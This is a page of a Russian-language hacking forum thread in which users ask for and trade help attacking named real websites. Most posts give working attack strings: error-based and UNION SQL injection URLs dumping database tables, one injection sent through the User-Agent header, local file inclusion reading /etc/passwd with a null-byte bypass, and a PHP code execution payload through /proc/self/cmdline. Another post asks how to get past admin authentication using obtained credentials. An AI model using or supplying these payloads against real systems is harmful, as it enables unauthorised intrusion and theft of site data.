Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. foma9999

    foma9999 New Member

    Joined:
    5 Jan 2010
    Messages:
    83
    Likes Received:
    2
    Reputations:
    -5
    http://wmrace.ru/buy.php?carid=-3'+union+select+1,2,3,4,5,6,7,8,9,10,11--+

    Помогите раскрутить, пока что смог - это узнать версию:
    Code:
    http://wmrace.ru/buy.php?carid=-3'%20OR%20(SELECT%20COUNT(*)%20FROM%20(SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%203)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%201,%2063),%20FLOOR(RAND(0)*2)))--+
    да, прямого вывода на стр. нету

    upd:
    antichat:antichat
     
    #19761 foma9999, 14 Mar 2012
    Last edited: 14 Mar 2012
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    http://wmrace.ru/buy.php?carid=3'+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1--+
    как error-based крути.

    upd:
    http://wmrace.ru/buy.php?carid=3'+and(select+1+from(select+count(*),concat((select+concat(table_name,0x00)+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+
     
    _________________________
  3. foma9999

    foma9999 New Member

    Joined:
    5 Jan 2010
    Messages:
    83
    Likes Received:
    2
    Reputations:
    -5
    Спасибо, жаль, не успел посмотреть, прикрыли, оперативно.
    А что выводил этот запрос?
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    все таблицы из information_schema.tables выводил.

    ты не первый)
     
    _________________________
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    та не норм, пишет же ошибку


    что я там неправильно подставил?
    http://zapoved.ru/?act=docs_more&id=3%27%29+limit+0,0+union+select+1,table_name,3,4,5,6,7+from+information_schema,tables+and+%28%27DzDB%27=%27DzDB
     
  6. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://zapoved.ru/?act=docs_more&id=-3%27%29+UNION+SELECT+1,table_name,3,4,5,6,7+from+information_schema.tables%23

    что не так? =\
     
    _________________________
  7. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    Реебят, а можете мне обьямнить какой толк от такой уязвимости как include(LFI)? ну допустим я смогу просмотреть файл etc/passwd а толк от него?, увижу пути и логины узеров без паролей и всё, может я чегото ещо не знаю, дайте линки почитаю
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    https://forum.antichat.ru/threadnav12123-1-10.html
    https://forum.antichat.ru/thread23501.html
    https://forum.antichat.ru/thread91807.html
    https://forum.antichat.ru/thread98525.html
     
    _________________________
    1 person likes this.
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    почитал, наол много итересного,
    такс а вот теперь, вопрос, а есть ла какойто софт для поиска логов апача?
    просто вручную както тупо.
    вот дппустим etc/passwd нашол
    http://zamok-met.ru/catalog.php?id=../../../../etc/passwd

    а логи не получается
    мне как тот весь список что тут https://forum.antichat.ru/thread91807.html

    в ручную переберать?

    или может есть более умный способ для их поиска? подскажите
     
  10. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605

    https://forum.antichat.ru/thread49775.html

    вот тут поищи, там где то в теме был вроде скрипт
     
    _________________________
  11. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,183
    Likes Received:
    618
    Reputations:
    690
    http://wonted.ru/programms/librute/
    https://rdot.org/forum/showthread.php?t=1142
     
    _________________________
    #19771 shell_c0de, 14 Mar 2012
    Last edited: 14 Mar 2012
  12. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    ухты, спасиб, но прога немного фуфловатся, ечто что именно касается словаря,
    ведь допустим путь может быть разный, не только
    ../../../../etc/passwd а и юольше ../../../../../../etc/passwd и меньше,
    мне как надо срегеть пути рзный длины и все записывать, получается? или я чегото непонимаю?
     
    #19772 qaz, 14 Mar 2012
    Last edited: 14 Mar 2012
  13. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    http://zamok-met.ru/catalog.php?id=../../../../etc/passwd%00
     
  14. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    52
    Likes Received:
    5
    Reputations:
    -4
    Подскажите как использовать эту инъекцию...

    GET http://www.lxphoto.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
    User-Agent: Mozilla' and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2))x from jos_users group by x)a)or'
     
  15. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    http://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol
    http://en.wikipedia.org/wiki/List_of_HTTP_headers

    Изучай
     
    _________________________
    1 person likes this.
  16. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Выполнение PHP кода:
    http://zamok-met.ru/catalog.php?id=../../../../proc/self/cmdline%00&<?php print php_uname();?>
    Вернет:
    /bin/apache2___[zamok-met.ru] GET /catalog.php?id=../../../../proc/self/cmdline%00&Linux cabol.beget.ru 2.6.35.14 #4 SMP Sun Aug 14 23:30:33 MSD 2011 x86_64 HTTP/1.0

    Запрос отправлять не через браузер, иначе все символы урлкодируются.

    Руки и голова ;)
     
    _________________________
    #19776 Expl0ited, 14 Mar 2012
    Last edited: 14 Mar 2012
    2 people like this.
  17. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    На админку стоит дополнительная авторизация .htaccess. Как-нить можно попасть в админ панель?

    П.С. Все логин, пасс админа есть
     
  18. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    52
    Likes Received:
    5
    Reputations:
    -4
    Спасибо за ответ, не могли бы ли вы подсказать какой-нибудь удобный инструмент для эксплуатации уязвимости?
     
  19. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    charles/tamper data в них хоть оргазм имитируй)
     
  20. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,183
    Likes Received:
    618
    Reputations:
    690
    Плагины мозиллы
    HttpREQ
    Inetcrack
    самописные скрипты
     
    _________________________
Thread Status:
Not open for further replies.